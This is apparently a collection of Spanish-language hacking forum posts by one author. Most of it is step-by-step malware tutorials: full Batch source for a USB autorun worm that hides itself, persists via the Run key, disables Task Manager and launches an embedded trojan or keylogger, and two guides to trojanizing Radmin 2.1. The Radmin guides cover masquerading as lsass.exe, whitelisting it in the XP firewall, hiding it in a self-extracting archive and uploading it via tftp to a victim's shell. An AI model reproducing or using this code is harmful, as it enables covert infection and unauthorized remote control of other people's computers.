Temas

Bueno hice un pequeño script Batch que utiliza de motor Wget para descargar musica de GOEAR 

les dejo el link de descarga del programa compilado junto con el codigo fuente

Código [Seleccionar] Expandir

+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+
                  ____        __  __                     ____    __     
/'\_/`\         /\  _`\   __/\ \/\ \            /'\_/`\/\  _`\ /\ \   
/\      \  __  __\ \,\L\_\/\_\ \ \/'/'          /\      \ \ \L\_\ \ \   
\ \ \__\ \/\ \/\ \\/_\__ \\/\ \ \ , <    _______\ \ \__\ \ \  _\L\ \ \ 
\ \ \_/\ \ \ \_\ \ /\ \L\ \ \ \ \ \\`\ /\______\\ \ \_/\ \ \ \L\ \ \_\
  \ \_\\ \_\ \____/ \ `\____\ \_\ \_\ \_\/______/ \ \_\\ \_\ \____/\/\_\
   \/_/ \/_/\/___/   \/_____/\/_/\/_/\/_/          \/_/ \/_/\/___/  \/_/

                                         -----  |B|y| |O|c|t|a|l|h|  -----
-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+
[=========================]

  Software:  MuSiK-ME!
  Coder:     Octalh
  Ver:       1.0
  Language:  Batch
´ Resources: Wget
  Package:   UPX

[=========================]

Programa para descargar musica de Goear xD [ www.goear.com ]
Compilado con Quick Batch File Compiler y comprimido con UPX

##Codigo fuente incluido##

Nota: los audios se guardan en la carpeta "downloads" 

[ DESCARGAR ]
http://www.badongo.com/file/8419210

SALU2 

[HOW-TO CREA TU WORM EN BACTH]

HOW-TO CREA TU WORM EN BACTH


Herramientas a utilizar:

Quick_Batch_File_Compiler_3.1.5.0
que pueden descargar del siguiente enlace
http://rapidshare.com/files/97127487/Quick_Batch_File_Compiler_3.1.5.0.rar.html

Bueno en esta ocasión les tratare de explicar en breves palabras como crear su propio worm programado en batch.

Considero que es una buena respuesta para todos aquellos que buscan programas ya hechos que hagan estas funciones, cuando resulta mas fácil aprender a programarse el suyo.

Como se que muchos de aqui nunca en su vida han programado algo, a excepción de unos cuantos bats, pues queria poner de ejemplo un código para que puedan realizar sus propias pruebas y aprender por si solos.

Aclaro que si eres programador, este manual definitivamente no te servirá, pero si eres alguien curioso que quiere aprender y no tiene idea de programación, este manual te puede ser de gran ayuda.

Empezare dando una breve explicación de lo que hará nuestro worm y las funciones que realiza

Básicamente lo que hará nuestro script es lo siguiente

*copiarse a si mismo a una carpeta en windows
*crear el autorun que posteriormente será copiado en la memoria extraible USB
*añadirse al inicio de windows
*alterar registro de windows para cancelar opciones del sistema
*ejecuta tu troyano, keylogger o lo que quieras
*si encuentra una unidad donde copiarse, se copia junto con su autorun
*se añade atributos de oculto, sistema y solo lectura
*espera aprox. 60 segundos y repite el ciclo


de esta forma dotamos a nuestro programa de la habilidad de propagarse por si solo.
con un poco de ayuda de la victima claro esta

Bien ahora que sabes lo que el gusano hará te paso a explicar brevemente las funciones que utilice en el código

SET  Sirve para definir una variable, por ejemplo
SET perro=firulais
de esa forma podemos cambiar el nombre del perro sin tener que hacerlo en cada una de las expreciones donde hagamos referencia a firulais.

ECHO Este comando basicamente sirve para "imprimir" en pantalla algun texto.

">" Este simbolo lo utilizamos para redirigir la salida de un comando, o tambien para comparar valores.

En este caso la salida del comando ECHO la dirigimos hacia un archivo de texto

IF NOT EXIST Este condicional se utiliza de la siguiente manera
SI NO EXISTE ... ENTONCES HAS ESTO
sirve para realizar acciones siempre y cuando se cumpla o no una condicion

Los demas son comandos basicos de la shell de windows CMD.EXE


Como funcionara el worm?
bien lo que haremos sera utilizar la herramientas antes mencionada para compilarlo y obtener un EXE que se ejecute de manera OCULTA, de esa forma no tendremos problemas con la tipica pantalla negra de los batch


el codigo del worm lo explique en cada sección.

Código (dos) [Seleccionar] Expandir

@ECHO OFF
REM          _______..___________.     ___      .______     
REM         /       ||           |    /   \     |   _  \     
REM        |   (----``---|  |----`   /  ^  \    |  |_)  |   
REM         \   \        |  |       /  /_\  \   |      /     
REM     .----)   |       |  |      /  _____  \  |  |\  \----.
REM     |_______/        |__|     /__/     \__\ | _| `._____|
REM     ____    __    ____   ______   .______      .___  ___.
REM     \   \  /  \  /   /  /  __  \  |   _  \     |   \/   |
REM      \   \/    \/   /  |  |  |  | |  |_)  |    |  \  /  |
REM       \            /   |  |  |  | |      /     |  |\/|  |
REM        \    /\    /    |  `--'  | |  |\  \----.|  |  |  |
REM         \__/  \__/      \______/  | _| `._____||__|  |__|
REM
REM    ____  ____  _________  ____  ____  ____  ____  ____  ____
REM   ||B ||||Y ||||       ||||O ||||C ||||T ||||A ||||L ||||H ||
REM   ||__||||__||||_______||||__||||__||||__||||__||||__||||__||
REM   |/__\||/__\||/_______\||/__\||/__\||/__\||/__\||/__\||/__\|
REM                                                     
REM
REM DESCRIPCION: Codigo en batch que copia un archivo "X" a "X" unidad
REM                   [   OCTALH@GMAIL.COM   ]                                                 
REM

REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++

                 SET WORMORIGINAL=juego.exe
                 REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
                 SET WORM=1044404.EXE
                 REM NOMBRE QUE TENDRA EN LA MEMORIA USB

REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++

SET AUTORUNORIGINAL=%WINDIR%\14785\WINUPDATE.DLL
REM DIRECCION COMPLETA DEL AUTORUN ESCONDIDO

SET AUTORUN=autorun.inf
REM NOMBRE QUE TENDRA EN LA MEMORIA USB

REM CREA UN DIRECTORIO EN LA CARPETA WINDOWS
MD "%WINDIR%\14785"

REM AQUI SE CREA EL ARCHIVO AUTORUN
ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

REM COPIA EL WORM A EL DIRECTORIO DE WINDOWS PARA OCULTARLO
COPY %WORMORIGINAL% "%WINDIR%\14785\SYSTEMSHELL.exe"
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

REM SE AGREGA AL INICIO DEL SISTEMA
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f
REM SE DESACTIVA EL ADMINISTRADOR DE TAREAS
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f
REM SE DESACTIVA LA OPCION DE VER ARCHIVOS OCULTOS
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f

:CHEKARWORM

REM VERIFICA LA EXISTENCIA DEL WORM

IF NOT EXIST "D:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "E:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "F:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "G:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "H:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "I:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "J:\%WORM%" GOTO COPIARWORM


:COPIARWORM

REM COPIA EL WORM Y LE ASIGNA ATRIBUTOS DE SOLO LECTURA
REM SISTEMA Y OCULTO.

COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%WORM%"
ATTRIB +S +H +R "E:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%WORM%"
ATTRIB +S +H +R "F:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%WORM%"
ATTRIB +S +H +R "G:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%WORM%"
ATTRIB +S +H +R "H:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%WORM%"
ATTRIB +S +H +R "I:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%WORM%"
ATTRIB +S +H +R "J:\%WORM%"

REM COPIADO DEL AUTORUN Y ASIGANCION DE ATRIBUTOS

COPY "%AUTORUNORIGINAL%" "E:\%AUTORUN%"
ATTRIB +S +H +R "E:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "F:\%AUTORUN%"
ATTRIB +S +H +R "F:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "G:\%AUTORUN%"
ATTRIB +S +H +R "G:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "H:\%AUTORUN%"
ATTRIB +S +H +R "H:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "I:\%AUTORUN%"
ATTRIB +S +H +R "I:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "J:\%AUTORUN%"
ATTRIB +S +H +R "J:\%AUTORUN%"

GOTO LOOP


:LOOP
REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
ping 127.0.0.1 -n 60
GOTO CHEKARWORM



bien ahora explicare como utilizar el codigo.

lo primero sera fijarce en esta parte del codigo

Código [Seleccionar] Expandir


                 SET WORMORIGINAL=juego.exe
                 REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
                 SET WORM=1044404.EXE
                 REM NOMBRE QUE TENDRA EN LA MEMORIA USB

Es indispensable que la variable WORMORIGINAL=juego.exe tenga el mismo nombre que el worm unaves compilado con QUICK BATCH FILE COMPILER

Tambien verifica esta parte del codigo

Código [Seleccionar] Expandir

REM EJECUTA TU SERVER
START %MYFILES%\server.exe

aqui donde dice server.exe tiene que tener el mismo nombre que el archivo a adjuntar en el QUICK BATCH FILE COMPILER.

Para compilar tu worm solo tienes que copiar el codigo en el QUICK BATCH FILE COMPILER

te debe quedar algo asi


Ahora haremos que se ejecute de forma oculta, para eso nos vamos a project, optiones y activamos la opcion Gost aplication



Ahora debes agregar tu aplicacion a propagar, puede ser un server de troyano, keylogger etc etc...
para eso vamos a la pestaña Embedded Files y damos click en el icono de la cruz verde y posteriormente añadimos nuestra aplicacion, tambien pueden agregar un icono personalizado en esta pestaña.



recuerda que este archivo se debe llamar como lo indicaste en

Código [Seleccionar] Expandir

REM EJECUTA TU SERVER
START %MYFILES%\server.exe

ahora precionamos F9 para compilarlo y listo!!, ahora tienes tu propio worm programado en batch.


Bien con esto llegamos al final de esta pequeña guia, espero que haya sido de tu agrado y cualquier cosa puedes comentar en el foro.


SALU2 y suerte

Hola estoy haciendo un script que copia un archivo desde C a una unidad extraible
antes usaba el metodo de

Código [Seleccionar] Expandir

If objFSO.FolderExists("UNIDAD_EXTRAIBLE:\") Then
objFSO.CopyFile "file.ini" , "UNIDAD_EXTRAIBLE:\file.ini", OverwriteExisting

pero no me gustaba puesto que este metodo solo verifica que exista dicha unidad sin importar si sea extraible o no entonces despues halle este code

Código [Seleccionar] Expandir

Const DriveTypeRemovable = 1
Set oFS = Wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'Loop thru A-Z. If found, exit early.
For Each Drive in oDrives
If Drive.DriveType = DriveTypeRemovable Then
If Drive.DriveLetter <> "A" Then
Wscript.Echo "Don't forget your thumb drive! " + Drive.DriveLetter
End If
End If
Next

ese codigo te da un aviso si tienes un medio extraible conectado (pendrives, ipod, etc..)
lo que quiero hacer es que por ejemplo si detecta una unidad extraible sin importar cual sea copie dicho archivo desde C a la unidad extraible

el problema es que no se como indicarle al codigo que el destino sea "X" unidad

algo asi como:

Código [Seleccionar] Expandir

Set oFile = oFS.GetFile("C:\archivo")
oFile.Copy (CUALQUIER_UNIDAD_EXTRAIBLE"\archivo"), true

gracias

solo una pregunta no se si sea solo yo, pero siempre e tendio mi cuenta configurada para ocutar mi email y ahora me acabo de dar cuenta que no la oculta y tengo la casilla activada no se desde cuando me pasa esto, pero hoy me di cuenta, antes no la mostraba... y otra cosa porque en mi firma ya no reconoce el codigo para cambiar el color

bueno eso era todo XD XD

salu2

Me contesto a mi mismo XD XD que tonto, me desconecte del foro y ahora veo que solo a mi me la muestra al resto no  lo de la firma si no se que pase

bueno el motivo de mi post es para preguntarles si alguno de ustedes conoce una microcamara con lente pinhole con sensor CMOS, de esas espias pero que no sea inalamabrica porque hay muchos problemas con muros y afecta a la recepecion, habia encontrado un link de una microcamara que tenia incorporada una pantalla lcd como del tamaño de una cajetilla de cigarros y ademas tenia una memoria para grabar, solo que perdi el link y ahora no logro encontrarla por ningun lado, si ustedes saben algo me seria de gran ayuda gracias.

[ACTUALIZACION TROYANIZANDO RADMIN 2.1]

ACTUALIZACION TROYANIZANDO RADMIN 2.1

By Octalh

Bueno antes que nada saludos a toda la gente del foro, ya tenia tiempo que no me pasaba por aqui... esque e andado algo desorientado pero bueno...

Debido a que en mi tutorial de troyanizando radmin se explica un metodo para empaquetarlo con una herramienta que ya es detectada por los AV me decidi a escribir esta actualizacion donde explicare otro metodo para empaquetarlo y que es 100 % indetectable a los av 

seria bueno que algun moderador editara este post y lo ponga en el otro post donde esta el tutorial de esa forma queda junto y no se pierde el hilo

bueno vamos a usar solamente una herramienta y lo mejor es que probablemente muchos ya la tienen instalada, ademas usare un metodo que descubri para brincarnos el FW del XP pero sin desactivarlo ya que si detenias el servicio a nuestra victima le salia un letrerito advirtiendole de su seguridad.. aaaa y ademas haremos que nuestro radmin no pueda ser cerrado desde el administrador de tareas 

ok si ya estan todos listos empezamos este tutorial

lo primero sera bajarnos en caso de que no lo tengan un programa que sirve para empaquetar archivos en .rar se llama WINRAR pues lo vamos a usar como joiner.

nos vamos a crear una carpeta y dentro de ella meteremos el server de radmin junto con su dll asi no hacemos desorden


r_server.exe


AdmDll.dll

bueno ahora renombramos el server de radmin por uno de estos nombres:

lsass.exe
winlogon.exe
smss.exe
csrss.exe
services.exe

la razon es porque estos son procesos del sistema criticos y por lo tanto no podran ser cerrados, esto se debe a que el administrador de tareas solo se fija en el nombre del proceso pero no de la ubicacion de este. Para mas informacion acerca de este bug click aqui http://lympex.sosvulnerable.net/resources/advisories/bug_proc_taskmgr.htm

despues le cambiaremos el icono por el del archivo original  quedando de la siguiente forma:

lsass.exe
  <===== r_server.exe

para cambiar el icono usaremos reshacker es una herramienta indispensable que ya todos deben tener.

ok con esto ya no podran cerrarlo desde el administrador de tareas, si lo intentan este sera el resultado



bien ya que esta renombrado y con nuevo icono procederemos a crearnos un bat, este como siempre agregara las llaves en el registro y ademas hara que el radmin pase el fw del xp sin tener que desactivarlo.

codigo del bat

Código [Seleccionar] Expandir

@echo off
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000" /f
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lsass /t REG_SZ /d "%windir%\lsass.exe" /f

REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v C:\WINDOWS\lsass.exe /t REG_SZ /d "C:\WINDOWS\lsass.exe:*:Enabled:lsass" /f

attrib +h +s c:/windows/bin.bat
attrib +h +s c:/windows/lsass.exe

exit


si se fijan en el registro en la siguiente clave

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida 

tambien añade atributos de archivo del sistema y oculto de esa forma no se pueden ver, ni con la opcion de mostrar archivos y carpetas ocultos, tienen que tener activada la otra opcion de mostrar archivos ocultos del sistema

el nombre del bat puede ser el que ustedes quieran yo le puse al mio bin.bat

bien ya que tenemos todo listo en nuestra carpeta procederemos empaquetarlo 

Se supone para este punto ya todos deben tener instalado WINRAR y si no es asi pues instalalo rapido porque ya es hora de darle uso

seleccionaremos los 3 archivos que tenemos

lsass.exe
AdmDll.dll
bin.bat

le daremos boton derecho del mouse, y le daremos en la opcion

Add to archive...

una ves en el menu vamos a palomear la opcion

Create SFX archive



ahora nos vamos a la pestaña avanced y le damos click al boton SFX options

ahora en donde dice patch to extract escribiremos

Código [Seleccionar] Expandir

c:\windows

y en run after extraction el nombre del bat en mi caso

Código [Seleccionar] Expandir

bin.bat



ahora nos dirigimos a la pestaña Modes y palomeamos

Hide all
Overwrite all files

de esta forma extrae todo de forma oculta y ademas en caso de que ya exsitan esos archivos los sobreescribe

ahora ya le dan en aceptar y esperan a que el winrar cree el .exe

pues bien ahora ya tienen el radmin empaquetado y con un doble click se instalara en el sistema de la victima, pueden empaquetarlo junto con un juego, un programa o una animacion en flash de esa forma mientras ven la animacion radmin es instalado en el sistema  y estara listo para usarse hasta el proximo reinicio.

Bien aqui termino este tutorial espero les guste, puedes distribuirlo siempre y cuando respetes las fuentes y no modifiques el texto.

Salu2 y suerte 

www.codeprojecteam.com

Bueno lo que pasa es que encontre una web donde tienen intros excelentes en 3d, muchos ya la conoceran, entonces e estao investigando para ver que programa es el que usaran para realizar essos incribles graficos, pero no doy, ya baje el 3d studio max el swift3d y estoy por bajar maya y autocad, esta es la web http://www.finerdesign.com/flash_web_templates.htm si alguien sabe que programa es por favor diganlo ???

[*Escritorio remoto de nuestra victima*Espiar escritorio*Subir y bajar archivos*Shell remota]

Troyanizando radmin 2.1

Hola lo mas problable es que muchos ya sepan como hacerlo, pero creo que la informacion nunca esta demas, asi que aqui va.

pues bien, radmin es una herramienta de administracion remota que nos permitira tener:

*Escritorio remoto de nuestra victima
*Espiar escritorio
*Subir y bajar archivos
*Shell remota

Yo utilice la versión 2.1 no se si con otras funcione, la web oficial de radmin es www.radmin.com

empecemos ya, voy a poner los pasos enumerados

1.- Nos bajamos el radmin, y lo instalamos en nuestra maquina

2.-Abrimos una shell, para eso nos vamos a inicio---- ejecutar---cmd.exe o cmommand.com segun sea el caso y nos dirigimos al directorio donde instalamos radmin

c:\archivos de programa\radmin\

y ejecutamos r_server.exe /setup

c:\archivos de programa\radmin\r_server.exe /setup

nos aparecera una ventana en la que podremos configurarlo a nuestro gusto.

3.-Escojemos la opcion Set password

ahora procedemos a introducir nuestro password, deben ser como minimo 8 caracteres, revisen que no este activada la opcion de Enable NT security y le damos en OK

ahora nos dirigimos a la opcion Options

en port pongan el que quieran, es el puerto que radmin usara para conectarce, de preferencia usen puertos arriba de 1000 para no levantar sospechas

en trai icon palomeen la opcion Hide trai icon, de esa manera cuando el servidor de radmin se ejecute en la maquina victima no se vera ningun icono

en las demas opciones asegurence de que todo esta desactivado, no quremos dejar logs de ningun tipo, ahora le damos en OK y en Exit.

ya tenemos nuestro radmin bien configurado  ahora viene lo bueno

voy a explicar dos metodos, uno para instalarlo desde shell remota de usuario y otra para hacer un solo ejecutable que ya tenga nuestro radmin y su configuracion.  bueno eso si veo interes en la gente del foro 

4.- bamos a ir al registro de windows a la siguiente clave:
HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters

y vamos a fijarnos en las siguientes entradas:

Port aqui esta el puerto que pusimos solo que en hexadecimal
Parameter esta es la contraseña
DisableTrayIcon es la opcion para ocultar el icono

lo que vamos a hacer es copiar los valores de esas tres entradas, porque ahorita las vamos a usar, en mi caso estos fueron los valores

Port  b7060000 yo use el puerto 1719
Parameter  3Ab503515d51eb10c3f98c7ab7bc5993
DisableTrayIcon  01000000 este debe estar asi

5.-Ahora nos dirigimos a la carpeta donde tenemos el radmin y le cambiamos el nombre a r_server.exe por otro menos sospechoso, yo le puse al mio waudt.exe y con la herramienta reshack le cambie el icono, yo le puse el de las actualizaciones automaticas (wuauclt.exe)

6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.

codigo:

REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"

solo sustituyan los valores por los suyos.

7.-Subir archivos via tftp

una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:

tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe

este es el radmin ya debidamente camuflageado

tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll

la dll del radmin, no le cambien el nombre

tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat

este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)

ahora solo basta con ejecutar el bat desde la shell y ya tendremos todo listo para el proximo reinicio, pero como nosotros somos muy impacientes y no podemos aguantar hasta el prox reinicio....

8.- Ejecutar radmin

desde la shell

wuaudt.exe /pass:mipassword /port:tupuerto

yo le puse a mi radmin wuadt.exe pero tu puedes ponerle como quieras, de esta forma ya puedes entrar con el cliente (radmin.exe) a hacer lo que te plasca sin nececidad de reinicar y la proxima ves que se inicie windows, radmin ya estara listo esperando tu conexion

bien aqui termino este tuto espero que les sirva de algo, a mi me a servido bastante y espero que a ustedes tambien

adios...

Tutorial escrito por: OCTALH